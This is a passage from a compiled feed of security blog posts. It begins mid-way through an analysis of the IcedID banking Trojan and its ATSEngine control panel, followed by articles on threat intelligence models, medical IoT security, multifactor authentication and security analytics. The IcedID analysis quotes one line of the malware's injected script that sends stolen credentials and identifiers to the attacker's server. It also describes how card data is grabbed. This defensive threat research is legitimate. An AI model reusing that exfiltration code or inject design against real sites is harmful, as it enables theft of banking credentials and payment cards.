Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and record his or her activity. The content-grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time, and it manages the attack’s variables.


Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:


Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots through a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

  • Checks for frames on the website to look for potential third-party security controls.
  • Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.
  • The main function that sets off the data grabbing process.
  • Adds new logs to the reports section in the attack server.
  • Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + "&pkey=" + urlEncode(pkey) + "&ssid=" + b, b)
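The card-validation step described above is most likely the standard Luhn checksum; a minimal sketch (not the malware's actual code):

```javascript
// Luhn checksum: double every second digit from the right, subtract 9 from
// any result above 9, and require the total to be divisible by 10.
function luhnValid(cardNumber) {
  const digits = cardNumber.replace(/\D/g, '');
  let sum = 0;
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[digits.length - 1 - i]);   // walk right to left
    if (i % 2 === 1) {                               // every second digit
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
  }
  return digits.length > 0 && sum % 10 === 0;
}

luhnValid('4539 1488 0343 6467');   // → true (well-known test number)
luhnValid('4539 1488 0343 6468');   // → false
```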

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:


Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:


Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel facilitates bot control, data management and the orchestration of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

Some Trojan gangs choose to expand their attack turf into more countries, but doing so requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, the gang does not appear to be looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America, targeting banks and e-commerce businesses in that region.

In 2018, IcedID ranked fourth on the global financial Trojan chart, having kept up its malicious activity throughout the year.


Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare

When a client asked me to help build a cyberthreat intelligence program recently, I jumped at the opportunity to try something new and challenging. To begin, I set about looking for some rudimentary templates with a good outline for building a threat intelligence process, a few solid platforms that are user-friendly, the basic models for cyber intelligence collection and a good website for describing various threats an enterprise might face. This is what I found:

  1. There are a handful of rudimentary templates for building a good cyberthreat intelligence program available for free online. All of these templates leave out key pieces of information that any novice to the cyberthreat intelligence field would be required to know. Most likely, this is done to entice organizations into spending copious amounts of money on a specialist.
  2. The number of companies that specialize in the collection of cyberthreat intelligence is growing at a ludicrous rate, and they all offer something that is different, unique to certain industries, proprietary, automated via artificial intelligence (AI) and machine learning, based on pattern recognition, or equipped with behavioral analytics.
  3. The basis for all threat intelligence is heavily rooted in one of three basic models: Lockheed Martin’s Cyber Kill Chain, MITRE’s ATT&CK knowledge base and The Diamond Model of Intrusion Analysis.
  4. A small number of vendors working on cyberthreat intelligence programs or processes published a complete list of cyberthreats, primary indicators, primary actors, primary targets, typical attack vectors and potential mitigation techniques. Of that small number, very few were honest when there was no useful mitigation or defensive strategy against a particular tactic.
  5. All of the cyberthreat intelligence models in use today have gaps that organizations will need to overcome.
  6. A search within an article content engine for helpful articles with the keyword “threat intelligence” produced more than 3,000 results, and a Google search produced almost a quarter of a million. This is completely ridiculous. Considering how many organizations struggle to find experienced cyberthreat intelligence specialists to join their teams — and that cyberthreats grow by the day while mitigation strategies do not — it is simply not possible that there are tens of thousands of professionals or experts in this field.

It’s no wonder why organizations of all sizes in a variety of industries are struggling to build a useful cyberthreat intelligence process. For companies that are just beginning their cyberthreat intelligence journey, it can be especially difficult to sort through all these moving parts. So where do they begin, and what can the cybersecurity industry do to adapt traditional threat intelligence models to the cyber battlefield?

How to Think About Thinking

A robust threat intelligence process serves as the basis for any cyberthreat intelligence program. Here is some practical advice to help organizations plan, build and execute their program:

  1. Stop and think about the type(s) of cyberthreat intelligence data the organization needs to collect. For example, if a company manufactures athletic apparel for men and women, it is unnecessary to collect signals intelligence, geospatial data or human intelligence.
  2. How much budget is available to collect the necessary cyberthreat intelligence? For example, does the organization have the budget to hire threat hunters and build a cyberthreat intelligence program uniquely its own? What about purchasing threat intelligence as a service? Perhaps the organization should hire threat hunters and purchase a threat intelligence platform for them to use? Each of these options has a very different cost model for short- and long-term costs.
  3. Determine where cyberthreat intelligence data should be stored once it is obtained. Does the organization plan to build a database or data lake? Does it intend to store collected threat intelligence data in the cloud? If that is indeed the intention, pause here and reread step one. Cloud providers have very different ideas about who owns data, and who is ultimately responsible for securing that data. In addition, cloud providers have a wide range of security controls — from the very robust to a complete lack thereof.
  4. How does the organization plan to use collected cyberthreat intelligence data? It can be used for strategic purposes, tactical purposes or both within an organization.
  5. Does the organization intend to share any threat intelligence data with others? If yes, then you can take the old cybersecurity industry adage “trust but verify” and throw it out. The new industry adage should be “verify and then trust.” Never assume that an ally will always be an ally.
  6. Does the organization have enough staff to spread the workload evenly, and does the organization plan to include other teams in the threat intelligence process? Organizations may find it very helpful to include other teams, either as strategic partners, such as vulnerability management, application security, infrastructure and networking, and risk management teams, or as tactical partners, such as red, blue and purple teams.

How Can We Adapt Threat Intelligence Models to the Cyber Battlefield?

As mentioned above, the threat intelligence models in use today were not designed for cyber warfare. They are typically linear models, loosely based on Carl von Clausewitz’s military strategy and tailored for warfare on a physical battlefield. It’s time for the cyberthreat intelligence community to define a new model, perhaps one that is three-dimensional, nonlinear, rooted in elementary number theory and that applies vector calculus.

Much like game theory, The Diamond Model of Intrusion Analysis is sufficient if there are two players (the victim and the adversary), but it tends to fall apart if the adversary is motivated by anything other than sociopolitical or socioeconomic payoff, if there are three or more players (e.g., where collusion, cooperation and defection of classic game theory come into play), or if the adversary is artificially intelligent. In addition, The Diamond Model of Intrusion Analysis attempts to show a stochastic model diagram but none of the complex equations behind the model — probably because that was someone’s 300-page Ph.D. thesis in applied mathematics. This is not much help to the average reader or a newcomer to the threat intelligence field.

Nearly all models published thus far are focused on either external actors or insider threats, as though a threat actor must be one or the other. None of the widely accepted models account for, or include, physical security.

While there are many good articles about reducing alert fatigue in the security operations center (SOC), orchestrating security defenses, optimizing the SOC with behavioral analysis and so on, these articles assume that the reader knows what any of these things mean and what to do about any of it. A veteran in the cyberthreat intelligence field would have doubts that behavioral analysis and pattern recognition are magic bullets for automated threat hunting, for example, since there will always be threat actors that don’t fit the pattern and whose behavior is unpredictable. Those are two of the many reasons why the fields of forensic psychology and criminal profiling were created.

Furthermore, when it comes to the collection of threat intelligence, very few articles provide insight on what exactly constitutes “useful data,” how long to store it and which types of data analysis would provide the best insight.

It would be a good idea to get the major players in the cyberthreat intelligence sector together to develop at least one new model — but preferably more than one. It’s time for industry leaders to develop new ways of classifying threats and threat actors, share what has and has not worked for them, and build more boundary connections than the typical socioeconomic or sociopolitical ones. The sector could also benefit from looking ahead at what might happen if threat actors choose to augment their crimes with algorithms and AI.

The post It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare appeared first on Security Intelligence.

A Hacker’s Take On Blockchain Security

One of the leading attractions of the blockchain—aside from the obvious decentralization—is the high level of security behind it. It’s not uncommon to hear people claim that it is “unhackable.”

The post A Hacker’s Take On Blockchain Security appeared first on The Cyber Security Place.

Buyer Beware: Not All Threat Intel Add-Ons are Equal

Like leather upholstery for your new car, add-ons to your threat intelligence service are hard to resist. But Chris Camacho of Flashpoint* says “buyer beware”: threat intel add-ons may be more trouble than they’re worth. If you’ve ever shopped for a new car, you’re likely familiar with the dizzying number of add-on...

Read the whole entry... »


11 Expert Takes On Data Privacy Day 2019 You Need To Read

The Council of Europe agreed that January 28 should be declared European Data Protection Day back in 2007; two years later, the U.S. joined in with Data Privacy Day.

The post 11 Expert Takes On Data Privacy Day 2019 You Need To Read appeared first on The Cyber Security Place.

The Threat Intelligence Market Segment – A Complete Mockery and IP Theft Compromise – An Open Letter to the U.S. Intelligence Community

I recently came across the newly published DoD Cyberspace Strategy 2018, which reminded me of a variety of resources I reviewed recently while catching up on the latest cyber warfare trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to spank the very bottom of your digital

How Secure Are Medical IoT Devices? Catherine Norcom Has Her Finger on the Pulse of the Industry

At the IBM Security Summit in 2018, X-Force Red Global Head Charles Henderson told a memorable story. A colleague frantically reached out one Friday afternoon asking him to test five medical internet of things (IoT) devices. One of the devices was to be implanted in the colleague’s body, and he wanted to make sure he chose the most secure model. Charles immediately called his hacker friends, who happily agreed to help him with the research. Within a couple of days, Charles recommended a specific model to his colleague, confident the model was the least hackable.

Unlike Charles’ colleague, most patients do not have someone on hand to test their medical IoT devices prior to implantation, which is why it’s critical for device manufacturers to build security into the devices from the earliest stages of development. Patients should be able to trust that the devices in their bodies have no critical vulnerabilities that criminals could potentially exploit.

A Q and A With ‘Q’: Reviewing the FDA’s Guidance on Medical IoT Devices

On Jan. 29–30, 2019, the Food and Drug Administration (FDA) will host a public workshop to discuss medical IoT security. The discussion will focus on the recently drafted guidance titled “Content of Premarket Submissions for Management of Cybersecurity in Medical Devices,” which aims to help strengthen cybersecurity across medical IoT devices.

Catherine Norcom, X-Force Red’s resident hardware hacker, specializes in building and testing IoT devices in the medical field. Catherine, also known as “Q,” recently joined the team after serving 10 years in the U.S. Air Force.

I chatted with Catherine about the FDA’s guidance, the top risks related to medical IoT devices and how to minimize those risks.

Question: Thank you for taking the time to chat today, Catherine. Which parts of the FDA’s guidance do you think may be most effective?

Catherine: I like the objective of the guidance. Manufacturers of medical IoT devices should be prioritizing security, especially considering the potential detrimental consequences of a breach. Specifically, I like the clause about logging people out after a period of inactivity. I also like the clause that discusses the need for rapid deployment of patches and updates.

However, that clause actually contradicts another clause in the guidance that recommends users approve any product updates before they are installed. That being said, in November 2018, the FDA provided more details on this topic, saying critical patches can and should be applied without user approval. I also think that’s an important update. After all, patient safety should not vary from user to user, simply based on whether they have the resources to process and deploy critical patches in a timely fashion. The FDA should include those details in the guidance.

I also like that the guidance promotes encrypting any information stored on devices and requires authentication of some kind before the user accesses medical information coming from the device. That way, if a user left a device on a bus, for example, someone else could not access the user’s private medical information.


Where do you think the guidance could be improved?

There are some parts that seem open to varying interpretations. For example, the guidance recommends assessing risk and mitigation throughout a product’s life cycle. However, manufacturers and end users can have different interpretations of what constitutes the life cycle of a product. Obviously, manufacturers will release newer versions of products, whether it’s because of their own innovations or due to external factors such as a pending update to a third-party operating system or plug-in that makes the existing product design a challenge to maintain.

When a manufacturer releases a new version of a product, they cannot continue to support all older versions of that product in the same manner they did before. But even after the manufacturer needs to end its support, the product may still work fine for some period. And even if it doesn’t work as well as it once did without manufacturer support, the user may choose to continue using and servicing it themselves. Although this is a difficult subject to address, it could be valuable if the guidance is able to spell out in more detail what the expectations are for manufacturers and users at different stages of a normal product life cycle. There are other FDA documents that include more details about this matter, but it should be spelled out in this guidance as well.

The guidance also uses buzzwords like “holistic.” Many manufacturers — and, frankly, people in general — do not know what that term means, or they may interpret it differently. Also, a part of the guidance recommends manufacturers identify vulnerabilities up front. This is both exceedingly nuanced and complex. For example, even if a manufacturer identified a vulnerability in the Wi-Fi connection, it may not know the USB port is also vulnerable. In this case, you need penetration testers to assess risk throughout the process, whether that means hiring outside specialists or someone in-house. Penetration testers, who are hackers, understand the many different ways criminals may exploit individual vulnerabilities or chain them together to compromise a device and its connected ecosystem.

Since X-Force Red specializes in cybersecurity, let’s pivot the conversation and discuss security risks that come with medical IoT devices.

Medical IoT devices are a top target of cybercriminals, so even if a manufacturer thinks it has developed a device with reasonable security, criminals may still find vulnerabilities. I recently read a Ponemon Institute study that said 67 percent of medical device makers believe an attack on one or more medical devices they have built is likely.

One of the most obvious points of vulnerability is if the user loses the device or the device is stolen. If criminals get physical access to the hardware, they may be able to access all of the medical data in that device. They could also potentially reverse engineer the device and in this way gain access to even more information that is stored on underlying servers. That information could aid in planning a larger attack against the device manufacturer or help criminals use patient identity in insurance fraud or other schemes.

Yes, physically stealing a device would provide the easiest pathway to compromising it. What about the risks related to the Wi-Fi connection used by most IoT devices?

Obviously, anything connected to Wi-Fi can potentially be compromised. A brute force attack is one of the more popular attack methods. The service set identifier (SSID) is the Wi-Fi network name you see when you try to connect. If a device broadcasts its SSID, for example, a criminal would see the device on the Wi-Fi network and may try every password under the sun until one grants him access. These attacks are typically automated by computers and it can take mere seconds to brute force a weak password.
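The arithmetic behind “mere seconds” is simply keyspace size divided by guess rate. The 10^9 guesses-per-second figure below is an assumed rate for automated cracking, not a measured one:

```javascript
// Seconds to exhaust every password of a given length over a given alphabet.
function secondsToExhaust(alphabetSize, length, guessesPerSecond) {
  return Math.pow(alphabetSize, length) / guessesPerSecond;
}

secondsToExhaust(26, 8, 1e9);    // 8 lowercase letters: ~209 seconds
secondsToExhaust(94, 12, 1e9);   // 12 printable ASCII chars: ~4.8e14 seconds (millions of years)
```

The takeaway matches the article's point: short, low-entropy passwords fall almost instantly, while length and alphabet size grow the search space exponentially.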

Also, if the Wi-Fi connection from the device is not secured and the data stored on the device is not encrypted, a criminal could intercept the packets and access medical data as it moves from the device to the router. Essentially, a criminal could grab the device’s stored medical data as it moves through the air.

What about USB ports? Many medical IoT devices contain USB ports similar to those we use to charge our cellphones.

Yes, USB ports on medical IoT devices can be used to transfer data. If someone plugs into the device’s USB port and the stored data is unencrypted, the person could potentially access the data. It’s similar to your cellphone: If you plug a USB cable into your phone and connect it to a laptop, you can see the data on your phone and move it to your laptop.

As a rule, people should avoid connecting to any USB port they do not control. That means avoiding those in airports, airplanes, public places, etc. Behind every USB port, there can be a device reading data without explicit permission.


So, what can IoT medical device manufacturers do to strengthen the security of their products as they’re being developed?

First, developers should make sure the device’s SSID is hidden so it doesn’t show up on Wi-Fi networks. Also, IoT manufacturers will oftentimes give all their devices the same SSID. For example, devices that are meant for the kitchen will have the SSID “kitchen.” If devices have the same SSID, then a criminal can connect to them even if they are hidden. It’s crucial that devices have unique SSIDs; preferably, owners should be able to rename them so the names are random and attackers won’t be able to readily look them up.

Good security practices for an application programming interface (API)-enabled device include making sure a criminal doesn’t have access to the API key — which is like a password — so that he or she can’t read the private medical data that the medical device is logging.

An easy and obvious recommendation is to use encryption. Any data on the device and the connection to the wireless hotspot or cell phone should be encrypted. Encryption will prevent criminals from reading private data whether they steal packets or plug into a USB port. Manufacturers can also make proprietary software that only talks to the specific IoT device and enables it to securely decrypt the data on it.

It’s also critical to have a secure connection between the device and Wi-Fi access point you are using. The device should not connect to anything that doesn’t require authentication.

Finally, manufacturers must test their hardware and software as the device is being developed. Manual penetration testing can uncover unknown vulnerabilities that automated tools may not find. For example, testers can determine whether the software was programmed in a way that makes files difficult to read. As they are writing and developing the device and its software, manufacturers should consult a security expert at every step, from selecting products to testing during development, and test after the device is built.

Any last words or recommendations for the FDA as it works to finalize the guidance?

Unfortunately, hacking an IoT device, medical or nonmedical, is oftentimes not that difficult. At the DEF CON hacker conference, people with little experience were hacking IoT coffee pots and voting booths in minutes. When you allow an IoT device on your network, if the device has a vulnerability, a criminal can easily compromise your entire network. That’s why it’s critical for all IoT manufacturers to prioritize security when developing their products.

This guidance is a step in the right direction to achieving that goal. It gives some really strong recommendations and places a focus on the subject of IoT security. The FDA is inviting comments from medical device and component manufacturers, independent researchers and security firms, which will be extremely beneficial in shaping the final draft. It’s always encouraging to see the security world’s perspective being brought into the development of this kind of guidance.

Listen to the X-Force Red in Action Podcast Series

The post How Secure Are Medical IoT Devices? Catherine Norcom Has Her Finger on the Pulse of the Industry appeared first on Security Intelligence.

Multifactor Authentication Delivers the Convenience and Security Online Shoppers Demand

Another holiday shopping season has ended, and for exhausted online consumers, this alone is good news. The National Retail Federation (NRF), the world’s largest retail trade association, reported that the number of online transactions surpassed that of in-store purchases during Thanksgiving weekend in the U.S. Online shopping is a growing, global trend that is boosted by big retailers and financial institutions.

However, according to a Javelin Strategy & Research study, many consumers remain skeptical about the security of online shopping and mobile banking systems. While 70 percent of those surveyed said they feel secure purchasing items from a physical store, the confidence level dropped to 56 percent for online purchases and 50 percent for mobile banking. How can retailers increase customer trust toward online transactions?

Security Versus Convenience: The Search for Equilibrium Continues

When we register for online services, we implicitly balance security and convenience. When we’re banking and shopping online, the need for security is greater. We are willing to spend more time to complete a transaction — for example, by entering a one-time password (OTP) received via SMS — in exchange for a safer experience. On the other hand, convenience becomes paramount when logging into social networks, often at the expense of security.

App or account types respondents cared most to protect (Source: IBM Future of Identity Study 2018)

A growing number of users are finding the right balance between convenience and security in biometric authentication capabilities such as fingerprint scanning and facial recognition. Passwords have done the job so far, but they are destined for an inexorable decline due to the insecurity of traditional authentication systems.

According to the “IBM Future of Identity Study 2018,” a fingerprint scan is perceived as the most secure authentication method, while alphanumeric passwords and digital personal identification numbers (PINs) are decidedly inferior. However, even biometrics have their faults; there are already a number of documented break-ins, data breaches, viable attack schemes and limitations. For instance, how would facial recognition behave in front of twins?

The Future of Identity Verification and Multifactor Authentication

Multifactor authentication (MFA) represents a promising alternative. MFA combines multiple authentication factors so that if one is compromised, the overall system can remain secure. The familiar system already in use for many online services — based on the combination of a password and an SMS code to authorize a login or transaction — is a simple example of two-factor authentication (2FA).

Authentication factors that are not visible, such as device fingerprinting, geolocation, IP reputation, device reputation and mobile network operator (MNO) data, can contribute substantially to identity verification. Some threat intelligence platforms can already provide most of this information to third-party applications and solutions. These elements add context to the user and device used for the online transaction and assist in quantifying the risk level of each operation.

These newly available capabilities open the way to context-based access, which conditions access on a dynamic assessment of the risk associated with each transaction, triggering additional verification steps when the risk level becomes too great.

Existing technologies for context-based access allow security teams to:

  • Register the user’s device, silently or subject to consent, and promptly identify any device substitution or attempt to impersonate the legitimate device;
  • Associate biometric credentials to registered devices, thus binding the legitimate device, user and online application;
  • Spot known users accessing data from unregistered devices and require additional authentication steps;
  • Move to passwordless login, based on scanning a time-based QR code without typing a password;
  • Verify the user’s presence, limiting the effectiveness of replay attacks and other automated attacks;
  • Use an authenticator app to access online services with 2FA that leverages the biometric device on the smartphone, such as the fingerprint reader, and stores biometric data only on the user’s device;
  • Use advanced authentication mechanisms, such as FIDO2, which standardizes the use of authentication devices for access to online services in mobile and desktop environments; and
  • Calculate the risk value for a transaction based on the user’s behavioral patterns.

Combining all these elements, context-based access solutions conduct a dynamic risk assessment of each transaction. The transaction risk score, compared against predefined policies, can allow or block an operation or request additional authentication elements.
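To make the mechanics concrete, here is a deliberately simplified sketch of such a dynamic risk assessment. The signals, weights and thresholds are illustrative assumptions, not any vendor’s actual scoring model:

```python
from dataclasses import dataclass

@dataclass
class TransactionContext:
    known_device: bool       # device previously registered to this user
    geo_velocity_ok: bool    # location consistent with the last seen login
    ip_reputation: float     # 0.0 (clean) .. 1.0 (known bad), e.g. from a threat feed
    behavior_anomaly: float  # 0.0 .. 1.0 from behavioral analytics

def risk_score(ctx):
    """Combine contextual signals into a 0..1 risk value (illustrative weights)."""
    score = 0.0
    if not ctx.known_device:
        score += 0.3
    if not ctx.geo_velocity_ok:
        score += 0.2
    score += 0.3 * ctx.ip_reputation
    score += 0.2 * ctx.behavior_anomaly
    return score

def decide(ctx, allow_below=0.3, block_above=0.7):
    """Compare the score against policy thresholds, as described above."""
    s = risk_score(ctx)
    if s < allow_below:
        return "allow"
    if s > block_above:
        return "block"
    return "step-up"  # request an additional authentication factor
```

The middle band is where context-based access earns its keep: instead of a hard allow/deny, the user is asked for one more factor only when the transaction actually looks risky.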

Get Your Customers Excited About Security

The aforementioned “IBM Future of Identity Study 2018” revealed clear demographic, geographic and cultural differences in the acceptance of authentication methods. These differences should inform how organizations encourage the adoption of next-generation authentication mechanisms and other emerging alternatives to traditional passwords.

Imposing a particular method of identity verification in the name of improved security can lead to user frustration, missed opportunities and even loss of customers. Instead, you should present new authentication mechanisms as more practical and convenient; that way, your customers will perceive them as a step toward innovation and progress rather than an impediment. If your authentication method feels “cool,” your users will be more excited to show it to colleagues and friends and less frustrated with a clunky login experience. You may even want to consider offering a wide range of authentication options and letting your users choose the one they prefer.

Multifactor authentication is here to stay as traditional passwords lose favor with both security professionals and increasingly privacy-aware customers. If retailers can frame these new techniques in a way that gets users excited about security, the future of identity verification in the industry looks bright.

The post Multifactor Authentication Delivers the Convenience and Security Online Shoppers Demand appeared first on Security Intelligence.

Stay Ahead of the Growing Security Analytics Market With These Best Practices

As breach rates climb and threat actors continue to evolve their techniques, many IT security teams are turning to new tools in the fight against corporate cybercrime. The proliferation of internet of things (IoT) devices, network services and other technologies in the enterprise has expanded the attack surface every year and will continue to do so. This evolving landscape is prompting organizations to seek out new ways of defending critical assets and gathering threat intelligence.

The Security Analytics Market Is Poised for Massive Growth

Enter security analytics, which mixes threat intelligence with big data capabilities to help detect, analyze and mitigate targeted attacks and persistent threats from outside actors as well as those already inside corporate walls.

“It’s no longer enough to protect against outside attacks with perimeter-based cybersecurity solutions,” said Hani Mustafa, CEO and co-founder of Jazz Networks. “Cybersecurity tools that blend user behavior analytics (UBA), machine learning and data visibility will help security professionals contextualize data and demystify human behavior, allowing them to predict, prevent and protect against insider threats.”

Security analytics can also provide information about attempted breaches from outside sources. Analytics tools work together with existing network defenses and strategies and offer a deeper view into suspicious activity, which could be missed or overlooked for long periods due to the massive amount of superfluous data collected each day.

Indeed, more security teams are seeing the value of analytics as the market appears poised for massive growth. According to Global Market Insights, the security analytics market was valued at more than $2 billion in 2015, and it is estimated to grow by more than 26 percent over the coming years — exceeding $8 billion by 2023. ABI Research put that figure even higher, estimating that the need for these tools will drive the security analytics market toward a revenue of $12 billion by 2024.

Why Are Security Managers Turning to Analytics?

For most security managers, investment in analytics tools represents a way to fill the need for more real-time, actionable information that plays a role in a layered, robust security strategy. Filtering out important information from the massive amounts of data that enterprises deal with daily is a primary goal for many leaders. Businesses are using these tools for many use cases, including analyzing user behavior, examining network traffic, detecting insider threats, uncovering lost data, and reviewing user roles and permissions.
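As a toy example of the user-behavior use case, a baseline-and-deviation check over per-user activity counts captures the core idea of filtering signal out of massive data. Real products use far richer models; the function and the z-score threshold here are our own illustrative choices:

```python
import statistics

def flag_anomalies(history, today, threshold=3.0):
    """Flag users whose activity today deviates more than `threshold`
    standard deviations from their own baseline.

    history: {user: [daily event counts]}, today: {user: today's count}
    Returns a list of (user, z_score) alerts.
    """
    alerts = []
    for user, counts in history.items():
        if len(counts) < 2:
            continue  # not enough baseline data for this user
        mean = statistics.mean(counts)
        stdev = statistics.stdev(counts) or 1e-9  # avoid division by zero
        z = (today.get(user, 0) - mean) / stdev
        if abs(z) > threshold:
            alerts.append((user, round(z, 1)))
    return alerts
```

A user whose activity stays near their own norm generates no alert, while a sudden spike (say, a service account suddenly making ten times its usual number of requests) surfaces immediately instead of drowning in the daily log volume.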

“There has been a shift in cybersecurity analytics tooling over the past several years,” said Ray McKenzie, founder and managing director of Red Beach Advisors. “Companies initially were fine with weekly or biweekly security log analytics and threat identification. This has morphed to real-time analytics and tooling to support vulnerability awareness.”

Another reason for analytics is to gain better insight into the areas that are most at risk within an IT environment. But in efforts to cull important information from a wide variety of potential threats, these tools also present challenges to the teams using them.

“The technology can also cause alert fatigue,” said Simon Whitburn, global senior vice president, cybersecurity services at Nominet. “Effective analytics tools should have the ability to reduce false positives while analyzing data in real-time to pinpoint and eradicate malicious activity quickly. At the end of the day, the key is having access to actionable threat intelligence.”

Personalization Is Paramount

Obtaining actionable threat intelligence means configuring these tools with your unique business needs in mind.

“There is no ‘plug and play’ solution in the security analytics space,” said Liviu Arsene, senior cybersecurity analyst at Bitdefender. “Instead, the best way forward for organizations is to identify and deploy the analytics tools that best fit an organization’s needs.”

When evaluating security analytics tools, consider the company’s size and the complexity of the challenges the business hopes to address. Some organizations may need to weigh features such as deployment models, scope and depth of analysis, forensics, and monitoring, reporting and visualization capabilities. Others may have simpler needs with minimal overhead and a smaller focus on forensics and advanced persistent threats (APTs).

“While there is no single analytics tool that works for all organizations, it’s important for organizations to fully understand the features they need for their infrastructure,” said Arsene.

Best Practices for Researching and Deploying Analytics Solutions

Once you have established your organization’s needs and goals for investing in security analytics, there are other important considerations to keep in mind.

Emphasize Employee Training

Chief information security officers (CISOs) and security managers must ensure that their staffs are prepared to use the tools at the outset of deployment. Training employees on how to make sense of information among the noise of alerts is critical.

“Staff need to be trained to understand the results being generated, what is important, what is not and how to respond,” said Steve Tcherchian, CISO at XYPRO Technology Corporation.

Look for Tools That Can Change With the Threat Landscape

Security experts know that criminals are always one step ahead of technology and tools and that the threat landscape is always evolving. It’s essential to invest in tools that can handle relevant data needs not just now, but also several years down the line. In other words, the solutions must evolve alongside the techniques and methodologies of threat actors.

“If the security tools an organization uses remain stagnant in their programming and update schedule, more vulnerabilities will be exposed through other approaches,” said Victor Congionti of Proven Data.

Understand That Analytics Is Only a Supplement to Your Team

Analytics tools are by no means a replacement for your security staff. Having analysts who can understand and interpret data is necessary to get the most out of these solutions.

Be Mindful of the Limitations of Security Analytics

Armed with security analytics tools, organizations can benefit from big data capabilities to analyze data and enhance detection with proactive alerts about potential malicious activity. However, analytics tools have their limitations, and enterprises that invest must evaluate and deploy these tools with their unique business needs in mind. The data obtained from analytics requires context, and trained staff need to understand how to make sense of important alerts among the noise.

The post Stay Ahead of the Growing Security Analytics Market With These Best Practices appeared first on Security Intelligence.

Need a Sounding Board for Your Incident Response Plan? Join a Security Community

Incident response teams face myriad uphill battles, such as the cybersecurity skills shortage, floods of security alerts and increasing IT complexity, to name just a few. These challenges often overwhelm security teams and leave security operations center (SOC) directors searching for strategies to maximize the productivity of their current team and technologies to build a capable incident response plan.

One emerging solution is a familiar one: an ecosystem of developer and expert communities. Collaborative online forums have always been a critical part of the cybersecurity industry, and communities dedicated to incident response are growing more robust than ever.

How to Get Involved in a Developer Community

Incident response communities can be a crucial resource to give security analysts access to hands-on, battle-tested experience. They can deliver highly valuable, lightweight, easy-to-use integrations that can be deployed quickly. Community-driven security can also provide playbooks, standard operating procedures (SOPs), best practices and troubleshooting tips. Most importantly, communities can help foster innovation by serving as a sounding board for your team’s ideas and introducing you to new strategies and techniques.

That all sounds great, but how do you know what community can best address your incident response needs? Where do you begin? Below are a few steps to help you get started.

1. Find the Communities That Are Most Relevant to You

To combat new threats that are being coordinated in real time, more and more vendors and services are fostering their own communities. Identify which ones are most relevant to your industry and business goals.

To start, narrow down your search based on the security products you use every day. In all likelihood, you’ll find users in these product-based communities who have faced similar challenges or have run into the same issues as your team.

Once you’ve selected the most relevant communities, make sure you sign up for constant updates. Join discussion forums, opt in to regular updates, and check back frequently for new blogs and other content. By keeping close tabs on these conversations, you can continuously review whether the communities you’ve joined are still relevant and valuable to your business.

2. Identify Existing Gaps in Your Security Processes

Communities are disparate and wide-ranging. Establishing your needs first will save you time and make communities more valuable to you. By identifying what type of intelligence you need to enhance your security strategy and incident response plan ahead of time, you can be confident that you’re joining the right channels and interacting with like-minded users.

Discussion forums are full of valuable information from other users who have probably had to patch up many of the same security gaps that affect your business. These forums also provide a window into the wider purpose of the community; aligning your identified gaps with this mission will help you maximize the value of your interactions.

3. Contribute to the Conversation

By taking part in these conversations, you can uncover unexpected benefits and give your team a sounding board among other users. As a security practitioner, it should be a priority to contribute direct and honest information to the community and perpetuate an industrywide culture of information sharing. Real-time, responsive feedback is a great tool to help you build a better security strategy and align a response plan to the current threat landscape.

Contributing to a community can take various forms. Community-based forums and Slack channels give developers a voice across the organization. By leveraging this mode of communication, you can bring important intelligence to the surface that might otherwise go under the radar. Forum discussions can also expose you to new perspectives from a diverse range of sources.

A Successful Incident Response Plan Starts With Collaboration

For its part, IBM Security gathers insights from experienced users across all its products in the IBM Security Community portal. Through this initiative, IBM has expanded its global network to connect like-minded people in cybersecurity. This collaborative network allows us to adapt to new developments as rapidly as threats evolve.

